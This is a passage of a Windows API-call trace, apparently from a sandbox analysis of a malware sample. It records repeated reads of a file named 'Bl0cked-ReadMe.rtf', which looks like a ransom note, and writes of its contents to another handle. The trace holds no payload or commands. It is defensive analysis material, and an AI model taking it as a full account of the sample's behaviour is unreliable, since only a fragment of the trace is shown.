(lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x12dee0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0135.945] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0135.945] _get_osfhandle (_FileHandle=4) returned 0x54 [0135.945] GetFileType (hFile=0x54) returned 0x1 [0135.945] _get_osfhandle (_FileHandle=4) returned 0x54 [0135.945] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x12df38 | out: lpFileSizeHigh=0x12df38*=0x0) returned 0x1632 [0135.945] _get_osfhandle (_FileHandle=4) returned 0x54 [0135.945] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.945] _get_osfhandle (_FileHandle=4) returned 0x54 [0135.946] ReadFile (in: hFile=0x54, lpBuffer=0x12ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12df60, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesRead=0x12df60*=0x200, lpOverlapped=0x0) returned 1 [0135.947] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.947] GetFileType (hFile=0x4c) returned 0x1 [0135.947] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.947] GetFileType (hFile=0x4c) returned 0x1 [0135.947] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.947] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.995] GetFileType (hFile=0x4c) returned 0x1 [0135.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.995] WriteFile (in: hFile=0x4c, lpBuffer=0x12edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12edc0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.995] GetFileType (hFile=0x4c) returned 0x1 [0135.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.995] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee10*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.995] GetFileType (hFile=0x4c) returned 0x1 [0135.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.995] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee60*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.995] GetFileType (hFile=0x4c) returned 0x1 [0135.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.995] WriteFile (in: hFile=0x4c, lpBuffer=0x12eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12eeb0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.995] GetFileType (hFile=0x4c) returned 0x1 [0135.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.995] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef00*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.995] GetFileType (hFile=0x4c) returned 0x1 [0135.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.995] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef50*, lpNumberOfBytesWritten=0x12df54*=0x20, lpOverlapped=0x0) returned 1 [0135.996] _get_osfhandle (_FileHandle=4) returned 0x54 [0135.996] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12df40 | out: lpNewFilePointer=0x0) returned 1 [0135.996] _get_osfhandle (_FileHandle=4) returned 0x54 [0135.996] ReadFile (in: hFile=0x54, lpBuffer=0x12ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12df60, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesRead=0x12df60*=0x200, lpOverlapped=0x0) returned 1 [0135.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.996] GetFileType (hFile=0x4c) returned 0x1 [0135.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.996] GetFileType (hFile=0x4c) returned 0x1 [0135.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.996] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.996] GetFileType (hFile=0x4c) returned 0x1 [0135.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.996] WriteFile (in: hFile=0x4c, lpBuffer=0x12edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12edc0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.996] GetFileType (hFile=0x4c) returned 0x1 [0135.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.996] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee10*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.996] GetFileType (hFile=0x4c) returned 0x1 [0135.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.996] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee60*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.997] GetFileType (hFile=0x4c) returned 0x1 [0135.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.997] WriteFile (in: hFile=0x4c, lpBuffer=0x12eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12eeb0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.997] GetFileType (hFile=0x4c) returned 0x1 [0135.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.997] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef00*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.997] GetFileType (hFile=0x4c) returned 0x1 [0135.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.997] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef50*, lpNumberOfBytesWritten=0x12df54*=0x20, lpOverlapped=0x0) returned 1 [0135.997] _get_osfhandle (_FileHandle=4) returned 0x54 [0135.997] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12df40 | out: lpNewFilePointer=0x0) returned 1 [0135.997] _get_osfhandle (_FileHandle=4) returned 0x54 [0135.997] ReadFile (in: hFile=0x54, lpBuffer=0x12ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12df60, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesRead=0x12df60*=0x200, lpOverlapped=0x0) returned 1 [0135.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.997] GetFileType (hFile=0x4c) returned 0x1 [0135.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.997] GetFileType (hFile=0x4c) returned 0x1 [0135.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.997] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.997] GetFileType (hFile=0x4c) returned 0x1 [0135.997] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.997] WriteFile (in: hFile=0x4c, lpBuffer=0x12edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12edc0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.998] GetFileType (hFile=0x4c) returned 0x1 [0135.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.998] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee10*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.998] GetFileType (hFile=0x4c) returned 0x1 [0135.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.998] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee60*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.998] GetFileType (hFile=0x4c) returned 0x1 [0135.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.998] WriteFile (in: hFile=0x4c, lpBuffer=0x12eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12eeb0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.998] GetFileType (hFile=0x4c) returned 0x1 [0135.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.998] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef00*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.998] GetFileType (hFile=0x4c) returned 0x1 [0135.998] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.998] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef50*, lpNumberOfBytesWritten=0x12df54*=0x20, lpOverlapped=0x0) returned 1 [0135.998] _get_osfhandle (_FileHandle=4) returned 0x54 [0135.998] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12df40 | out: lpNewFilePointer=0x0) returned 1 [0135.999] _get_osfhandle (_FileHandle=4) returned 0x54 [0135.999] ReadFile (in: hFile=0x54, lpBuffer=0x12ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12df60, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesRead=0x12df60*=0x200, lpOverlapped=0x0) returned 1 [0135.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.999] GetFileType (hFile=0x4c) returned 0x1 [0135.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.999] GetFileType (hFile=0x4c) returned 0x1 [0135.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.999] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.999] GetFileType (hFile=0x4c) returned 0x1 [0135.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.999] WriteFile (in: hFile=0x4c, lpBuffer=0x12edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12edc0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.999] GetFileType (hFile=0x4c) returned 0x1 [0135.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.999] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee10*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.999] GetFileType (hFile=0x4c) returned 0x1 [0135.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.999] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee60*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.999] GetFileType (hFile=0x4c) returned 0x1 [0135.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.999] WriteFile (in: hFile=0x4c, lpBuffer=0x12eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12eeb0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.999] GetFileType (hFile=0x4c) returned 0x1 [0135.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.999] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef00*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0135.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0135.999] GetFileType (hFile=0x4c) returned 0x1 [0135.999] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.000] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef50*, lpNumberOfBytesWritten=0x12df54*=0x20, lpOverlapped=0x0) returned 1 [0136.000] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.000] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12df40 | out: lpNewFilePointer=0x0) returned 1 [0136.000] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.000] ReadFile (in: hFile=0x54, lpBuffer=0x12ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12df60, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesRead=0x12df60*=0x200, lpOverlapped=0x0) returned 1 [0136.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.000] GetFileType (hFile=0x4c) returned 0x1 [0136.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.000] GetFileType (hFile=0x4c) returned 0x1 [0136.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.000] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.000] GetFileType (hFile=0x4c) returned 0x1 [0136.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.000] WriteFile (in: hFile=0x4c, lpBuffer=0x12edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12edc0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.000] GetFileType (hFile=0x4c) returned 0x1 [0136.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.000] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee10*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.000] GetFileType (hFile=0x4c) returned 0x1 [0136.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.000] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee60*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.000] GetFileType (hFile=0x4c) returned 0x1 [0136.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.000] WriteFile (in: hFile=0x4c, lpBuffer=0x12eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12eeb0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.000] GetFileType (hFile=0x4c) returned 0x1 [0136.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.000] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef00*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.000] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.000] GetFileType (hFile=0x4c) returned 0x1 [0136.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.001] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef50*, lpNumberOfBytesWritten=0x12df54*=0x20, lpOverlapped=0x0) returned 1 [0136.001] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.001] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12df40 | out: lpNewFilePointer=0x0) returned 1 [0136.001] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.001] ReadFile (in: hFile=0x54, lpBuffer=0x12ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12df60, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesRead=0x12df60*=0x200, lpOverlapped=0x0) returned 1 [0136.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.001] GetFileType (hFile=0x4c) returned 0x1 [0136.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.001] GetFileType (hFile=0x4c) returned 0x1 [0136.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.001] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.001] GetFileType (hFile=0x4c) returned 0x1 [0136.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.001] WriteFile (in: hFile=0x4c, lpBuffer=0x12edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12edc0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.001] GetFileType (hFile=0x4c) returned 0x1 [0136.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.001] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee10*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.001] GetFileType (hFile=0x4c) returned 0x1 [0136.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.001] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee60*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.001] GetFileType (hFile=0x4c) returned 0x1 [0136.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.001] WriteFile (in: hFile=0x4c, lpBuffer=0x12eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12eeb0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.001] GetFileType (hFile=0x4c) returned 0x1 [0136.001] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.001] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef00*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.002] GetFileType (hFile=0x4c) returned 0x1 [0136.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.002] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef50*, lpNumberOfBytesWritten=0x12df54*=0x20, lpOverlapped=0x0) returned 1 [0136.002] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.002] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12df40 | out: lpNewFilePointer=0x0) returned 1 [0136.002] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.002] ReadFile (in: hFile=0x54, lpBuffer=0x12ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12df60, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesRead=0x12df60*=0x200, lpOverlapped=0x0) returned 1 [0136.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.002] GetFileType (hFile=0x4c) returned 0x1 [0136.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.002] GetFileType (hFile=0x4c) returned 0x1 [0136.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.002] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.002] GetFileType (hFile=0x4c) returned 0x1 [0136.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.002] WriteFile (in: hFile=0x4c, lpBuffer=0x12edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12edc0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.002] GetFileType (hFile=0x4c) returned 0x1 [0136.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.002] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee10*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.002] GetFileType (hFile=0x4c) returned 0x1 [0136.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.002] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ee60*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.002] GetFileType (hFile=0x4c) returned 0x1 [0136.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.002] WriteFile (in: hFile=0x4c, lpBuffer=0x12eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12eeb0*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.002] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.003] GetFileType (hFile=0x4c) returned 0x1 [0136.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.003] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef00*, lpNumberOfBytesWritten=0x12df54*=0x50, lpOverlapped=0x0) returned 1 [0136.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.003] GetFileType (hFile=0x4c) returned 0x1 [0136.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.003] WriteFile (in: hFile=0x4c, lpBuffer=0x12ef50*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12df54, lpOverlapped=0x0 | out: lpBuffer=0x12ef50*, lpNumberOfBytesWritten=0x12df54*=0x20, lpOverlapped=0x0) returned 1 [0136.003] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.003] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12df40 | out: lpNewFilePointer=0x0) returned 1 [0136.003] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.003] ReadFile (in: hFile=0x54, lpBuffer=0x12ed70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12df60, lpOverlapped=0x0 | out: lpBuffer=0x12ed70*, lpNumberOfBytesRead=0x12df60*=0x200, lpOverlapped=0x0) returned 1 [0136.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.003] GetFileType (hFile=0x4c) returned 0x1 [0136.003] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.003] GetFileType (hFile=0x4c) returned 0x1 [0136.003] _get_osfhandle (_FileHandle=1) returned 0x4c 